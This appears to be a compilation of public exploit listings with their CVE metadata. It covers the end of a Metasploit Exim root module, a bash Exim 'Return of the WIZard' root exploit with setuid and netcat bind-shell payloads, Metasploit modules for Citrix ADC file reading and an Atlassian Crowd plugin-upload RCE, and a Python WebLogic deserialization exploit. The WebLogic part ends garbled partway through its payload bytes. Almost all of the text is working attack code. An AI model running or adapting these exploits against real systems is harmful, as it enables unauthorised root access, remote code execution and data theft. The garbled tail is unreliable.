        read -u 3 && echo $REPLY
        for i in $(seq 1 30); do
          echo 'Received: $i' >&3
        done
        echo "." >&3
        read -u 3 && echo $REPLY
        echo "quit" >&3
        read -u 3 && echo $REPLY
      |

      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
      write_file(@bash_script_path, bash_script)
      register_file_for_cleanup(@bash_script_path)
      chmod(@bash_script_path)
      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
    end

    print_status('Payload sent, wait a few seconds...')
    Rex.sleep(5)
  end

  def check_for_bash
    unless command_exists?('/bin/bash')
      fail_with(Failure::NotFound, 'bash not found')
    end
  end

  def on_new_session(session)
    super

    if session.type == 'meterpreter'
      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
      session.fs.file.rm(@payload_path)
    else
      session.shell_command_token("rm -f #{@payload_path}")
    end
  end

  def check
    if session.type == 'meterpreter'
      begin
        socket_subsystem, socket = open_tcp_connection
      rescue
        return CheckCode::Safe
      end
      res = socket.gets
      socket.close
      socket_subsystem.shutdown
    else
      check_for_bash
      res = cmd_exec("/bin/bash -c 'exec 3</dev/tcp/localhost/#{datastore['EXIMPORT']} && "\
                     "(read -u 3 && echo $REPLY) || echo false'")
      if res == 'false'
        vprint_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
                     "are you sure exim is listening on this port? (see EXIMPORT)")
        return CheckCode::Safe
      end
    end

    if res =~ /Exim ([0-9\.]+)/i
      version = Gem::Version.new($1)
      vprint_status("Found exim version: #{version}")
      if version >= target[:lower_version] && version <= target[:upper_version]
        return CheckCode::Appears
      else
        return CheckCode::Safe
      end
    end

    CheckCode::Unknown
  end

  def exploit
    if is_root?
      unless datastore['ForceExploit']
        fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
      end
    end

    unless writable?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
    end

    if nosuid?(base_dir)
      fail_with(Failure::BadConfig, "#{base_dir} is mounted nosuid")
    end

    unless datastore['PrependSetuid'] && datastore['PrependSetgid']
      fail_with(Failure::BadConfig, 'PrependSetuid and PrependSetgid must both be set to true in order ' \
                                    'to get root privileges.')
    end

    if session.type == 'shell'
      check_for_bash
    end

    @payload_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
    write_file(@payload_path, payload.encoded_exe)
    register_file_for_cleanup(@payload_path)
    inject_payload(encode_command("/bin/sh -c 'chown root #{@payload_path};"\
                                  "chmod 4755 #{@payload_path}'"))

    unless setuid?(@payload_path)
      fail_with(Failure::Unknown, "Couldn't escalate privileges")
    end

    cmd_exec("#{@payload_path} & echo ")
  end
end

# 0day.today [2021-09-27] #
```

**Exim 4.91 Local Privilege Escalation Exploit** (0day.today, ID 1337DAY-ID-32869, published 2019-06-17)

- CVE: CVE-2019-10149
- CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- Source: https://0day.today/exploit/32869

Exploit for the Linux platform, category local exploits.

```bash
#!/bin/bash

#
# raptor_exim_wiz - "The Return of the WIZard" LPE exploit
# Copyright (c) 2019 Marco Ivaldi <[email protected]>
#
# A flaw was found in Exim versions 4.87 to 4.91 (inclusive).
# Improper validation of recipient address in deliver_message()
# function in /src/deliver.c may lead to remote command execution.
# (CVE-2019-10149)
#
# This is a local privilege escalation exploit for "The Return
# of the WIZard" vulnerability reported by the Qualys Security
# Advisory team.
#
# Credits:
# Qualys Security Advisory team (kudos for your amazing research!)
# Dennis 'dhn' Herrmann (/dev/tcp technique)
#
# Usage (setuid method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m setuid
# Preparing setuid shell helper...
# Delivering setuid payload...
# [...]
# Waiting 5 seconds...
# -rwsr-xr-x 1 root raptor 8744 Jun 16 13:03 /tmp/pwned
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
# Usage (netcat method):
# $ id
# uid=1000(raptor) gid=1000(raptor) groups=1000(raptor) [...]
# $ ./raptor_exim_wiz -m netcat
# Delivering netcat payload...
# Waiting 5 seconds...
# localhost [127.0.0.1] 31337 (?) open
# id
# uid=0(root) gid=0(root) groups=0(root)
#
# Vulnerable platforms:
# Exim 4.87 - 4.91
#
# Tested against:
# Exim 4.89 on Debian GNU/Linux 9 (stretch) [exim-4.89.tar.xz]
#

METHOD="setuid" # default method
PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
    echo "$0 [-m METHOD]"
    echo
    echo "-m setuid : use the setuid payload (default)"
    echo "-m netcat : use the netcat payload"
    echo
    exit 1
}

# payload delivery
function exploit()
{
    # connect to localhost:25
    exec 3<>/dev/tcp/localhost/25

    # deliver the payload
    read -u 3 && echo $REPLY
    echo "helo localhost" >&3
    read -u 3 && echo $REPLY
    echo "mail from:<>" >&3
    read -u 3 && echo $REPLY
    echo "rcpt to:<$PAYLOAD>" >&3
    read -u 3 && echo $REPLY
    echo "data" >&3
    read -u 3 && echo $REPLY
    for i in {1..31}
    do
        echo "Received: $i" >&3
    done
    echo "." >&3
    read -u 3 && echo $REPLY
    echo "quit" >&3
    read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi <[email protected]>'
echo

# parse command line
while [ ! -z "$1" ]; do
    case $1 in
        -m) shift; METHOD="$1"; shift;;
        * ) usage
        ;;
    esac
done
if [ -z $METHOD ]; then
    usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

    # prepare a setuid shell helper to circumvent bash checks
    echo "Preparing setuid shell helper..."
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
    gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
    if [ $? -ne 0 ]; then
        echo "Problems compiling setuid shell helper, check your gcc."
        echo "Falling back to the /bin/sh method."
        cp /bin/sh /tmp/pwned
    fi
    echo

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_SETUID
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    ls -l /tmp/pwned
    /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_NETCAT
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    nc -v 127.0.0.1 31337

# print help
else
    usage
fi

# 0day.today [2019-06-18] #
```

**Citrix ADC NetScaler Local File Inclusion** (Packet Storm, ID PACKETSTORM:160047, published 2020-11-13)

- CVEs: CVE-2020-8193, CVE-2020-8195, CVE-2020-8196
- CVSS v2: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
- Source: https://packetstormsecurity.com/files/160047/Citrix-ADC-NetScaler-Local-File-Inclusion.html (download: https://packetstormsecurity.com/files/download/160047/citrixadvnetscaler-lfi.rb.txt)

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Citrix ADC NetScaler - Local File Inclusion (Metasploit)',
      'Description' => %{
        The remote device is affected by multiple vulnerabilities.

        An authorization bypass vulnerability exists in Citrix ADC and NetScaler Gateway devices.
        An unauthenticated remote attacker with access to the `NSIP/management interface` can exploit
        this to bypass authorization (CVE-2020-8193).

        And Information disclosure (CVE-2020-8195 and CVE-2020-8196) - but at this time unclear which.
      },
      'Author' => [
        'Donny Maasland',                # Discovery
        'mekhalleh (RAMELLA Sébastien)'  # Module author (Zeop Entreprise)
      ],
      'References' => [
        ['CVE', '2020-8193'],
        ['CVE', '2020-8195'],
        ['CVE', '2020-8196'],
        ['URL', 'https://dmaasland.github.io/posts/citrix.html'],
        ['URL', 'https://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/amp/'],
        ['URL', 'https://github.com/jas502n/CVE-2020-8193']
      ],
      'DisclosureDate' => '2020-07-09',
      'License' => MSF_LICENSE,
      'DefaultOptions' => {
        'RPORT' => 443,
        'SSL' => true
      }
    ))

    register_options([
      OptEnum.new('MODE', [true, 'Start type.', 'discovery', [ 'discovery', 'interactive', 'sessions']]),
      OptString.new('PATH', [false, 'File or directory you want to read', '/nsconfig/ns.conf']),
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  # Forge a session: the unauthenticated POST to /pcidss/report answers 406 but still sets a SESSID cookie
  def create_session
    params = 'type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1'

    request = {
      'method' => 'POST',
      'uri' => "#{normalize_uri(target_uri.path, 'pcidss', 'report')}?#{params}",
      'ctype' => 'application/xml',
      'headers' => {
        'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
        'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8)
      },
      'data' => '<appfwprofile><login></login></appfwprofile>'
    }
    request = request.merge({'cookie' => @cookie}) if @cookie

    response = send_request_raw(request)
    unless response && response.code == 406
      print_error("#{@message_prefix} - No response to session request.")
      return
    end

    response.get_cookies
  end

  def fix_session_rand
    response = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'menu', 'ss'),
      'cookie' => @cookie,
      'vars_get' => {
        'sid' => 'nsroot',
        'username' => 'nsroot',
        'force_setup' => '1'
      }
    )

    if response && response.code == 302
      location = response.headers['location']

      response = send_request_cgi(
        'method' => 'GET',
        'uri' => location,
        'cookie' => @cookie
      )

      return unless response && response.code == 200
    end

    response.to_s.scan(/rand = "([^"]+)"/).join
  end

  def read_lfi(path, var_rand)
    params = "filter=path:#{path}"

    request = {
      'method' => 'POST',
      'uri' => "#{normalize_uri(target_uri.path, 'rapi', 'filedownload')}?#{params}",
      'cookie' => @cookie,
      'ctype' => 'application/xml',
      'headers' => {
        'X-NITRO-USER' => Rex::Text.rand_text_alpha(6..8),
        'X-NITRO-PASS' => Rex::Text.rand_text_alpha(6..8),
        'rand_key' => var_rand
      },
      'data' => '<clipermission></clipermission>'
    }

    response = send_request_raw(request)
  end

  def run_host(ip)
    proto = (datastore['SSL'] ? 'https' : 'http')
    @message_prefix = "#{proto}://#{ip}:#{datastore['RPORT']}"

    @cookie = create_session
    if @cookie && @cookie =~ /SESSID/
      print_status("#{@message_prefix} - Got session: #{@cookie.split(' ')[0]}")

      var_rand = fix_session_rand
      unless var_rand
        print_error("#{@message_prefix} - Unable to get rand value.")
        return Exploit::CheckCode::Unknown
      end
      print_status("#{@message_prefix} - Got rand: #{var_rand}")

      print_status("#{@message_prefix} - Re-breaking session...")
      create_session

      case datastore['MODE']
      when /discovery/
        response = read_lfi('/etc/passwd'.gsub('/', '%2F'), var_rand)
        if response.code == 406
          if response.body.include?('root:*:0:0:')
            print_warning("#{@message_prefix} - Vulnerable.")

            return Exploit::CheckCode::Vulnerable
          end
        end
      when /interactive/
        # TODO: parse response
        response = read_lfi(datastore['PATH'].gsub('/', '%2F'), var_rand)
        if response.code == 406
          print_line("#{response.body}")
        end

        return
      when /sessions/
        # TODO: parse response
        response = read_lfi('/var/nstmp'.gsub('/', '%2F'), var_rand)
        if response.code == 406
          print_line("#{response.body}")
        end

        return
      end
    end
    print_good("#{@message_prefix} - Not Vulnerable.")

    return Exploit::CheckCode::Safe
  end

end
```

**Atlassian Crowd pdkinstall Remote Code Execution** (Packet Storm, ID PACKETSTORM:163810, published 2021-08-12)

- CVE: CVE-2019-11580
- CVSS v3.0: 9.8 Critical (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
- Source: https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html (download: https://packetstormsecurity.com/files/download/163810/atlassian_crowd_pdkinstall_plugin_upload_rce.rb.txt)

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE',
        'Description' => %q{
          This module can be used to upload a plugin on Atlassian Crowd via
          the pdkinstall development plugin as an unauthenticated attacker.
          The payload is uploaded as a JAR archive containing a servlet using
          a POST request to /crowd/admin/uploadplugin.action. The check command will
          check that the /crowd/admin/uploadplugin.action page exists and that it
          responds appropriately to determine if the target is vulnerable or not.
        },
        'Author' => [
          'Paul',           # Vulnerability discovery
          'Corben Leo',     # PoC and Vulnerability Writeup. @hacker_ on Twitter.
          'Grant Willcox'   # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' =>
          [
            ['CVE', '2019-11580'],
            ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
            ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
          ],
        'Platform' => %w[java],
        'Arch' => ARCH_JAVA,
        'DefaultOptions' => {
          'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out.
        },
        'Notes' =>
          {
            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
            'Reliability' => [ REPEATABLE_SESSION ],
            'Stability' => [ CRASH_SAFE ]
          },
        'Targets' =>
          [
            [
              'Java Universal',
              {
                'Arch' => ARCH_JAVA,
                'Platform' => 'java'
              }
            ]
          ],
        'DisclosureDate' => '2019-05-22'
      )
    )

    register_options(
      [
        Opt::RPORT(8095),
        OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/'])
      ]
    )
  end

  def upload_plugin(content)
    data = Rex::MIME::Message.new
    data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'),
      'method' => 'POST',
      'data' => data.to_s,
      'ctype' => "multipart/mixed; boundary=#{data.bound}"
    }, datastore['HttpClientTimeout'])
  end

  def generate_plugin_jar
    name = Rex::Text.rand_text_alpha(8..12)
    servlet_name = Rex::Text.rand_text_alpha(8..12)
    atlassian_plugin_xml = %(
      <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet">
        <plugin-info>
          <param name="atlassian-data-center-compatible">true</param>
          <description></description>
          <version>1.0.0</version>
        </plugin-info>

        <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet">
          <url-pattern>/#{name}</url-pattern>
          <description>#{Faker::App.name}</description>
        </servlet>
      </atlassian-plugin>
    )

    # Generates .jar file for upload
    zip = payload.encoded_jar
    zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)

    servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class')
    zip.add_file('/metasploit/PayloadServlet.class', servlet)

    contents = zip.pack
    [contents, name]
  end

  def check
    print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...')
    res = upload_plugin(Rex::Text.rand_text_alpha(45..120))
    if res.nil?
      CheckCode::Unknown('Was not able to connect to the target!')
    elsif (res.body =~ /Unable to install plugin/) && (res.code == 400)
      CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!")
    else
      CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!")
    end
  end

  def exploit
    print_status('Generating a malicious JAR plugin...')
    content, plugin_name = generate_plugin_jar
    print_status('Uploading the malicious JAR plugin...')
    upload_plugin(content)
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"),
      'method' => 'GET'
    }, datastore['HttpClientTimeout'])
  end
end
```

**Oracle WebLogic Server Java Deserialization Remote Code Execution** (Packet Storm, ID PACKETSTORM:144405, published 2017-09-29)

- CVE: CVE-2015-4852
- Source: https://packetstormsecurity.com/files/144405/Oracle-WebLogic-Server-Java-Deserialization-Remote-Code-Execution.html

```python
# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]
# Date: [27/09/2017]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vulnerability Author: FoxGloveSecurity
# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]
# Affected Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]
# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]
# CVE : [CVE-2015-4852]

'''
This exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send
Ping requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.
Feel free to modify the payload(chunk2) with that of your choice. Don't worry about modifying the payload length each time you change the payload as
this script will do it for you on the fly.
'''

#!/usr/bin/env python
import socket
import sys
import struct
from binascii import unhexlify

print "\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit..."
print "[+]Here is the command:\n\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\n"

if len(sys.argv) < 2:
    print "\n[+]Please provide target IP and Port..."
    print "[+]Usage:\n\t ./weblogic_linuxPing.py <target_ip> <target_port>"
    sys.exit()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+]Connecting to %s port %s' % server_address
sock.connect(server_address)

#Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print '[+]Sending\n"%s"' % headers
sock.sendall(headers)

data = sock.recv(1024)
print >>sys.stderr, '\n[+]Received "%s"' % data


#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.
#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length
chunk1='\x00\x00\x0b\x4d\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x
```
00\\x78\\xfe\\x01\\x00\\x00' \n \n \n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out \n#len(payload) is xxxx bytes \n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target. \n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload. \n \n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :) \nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x8
2\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6
d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\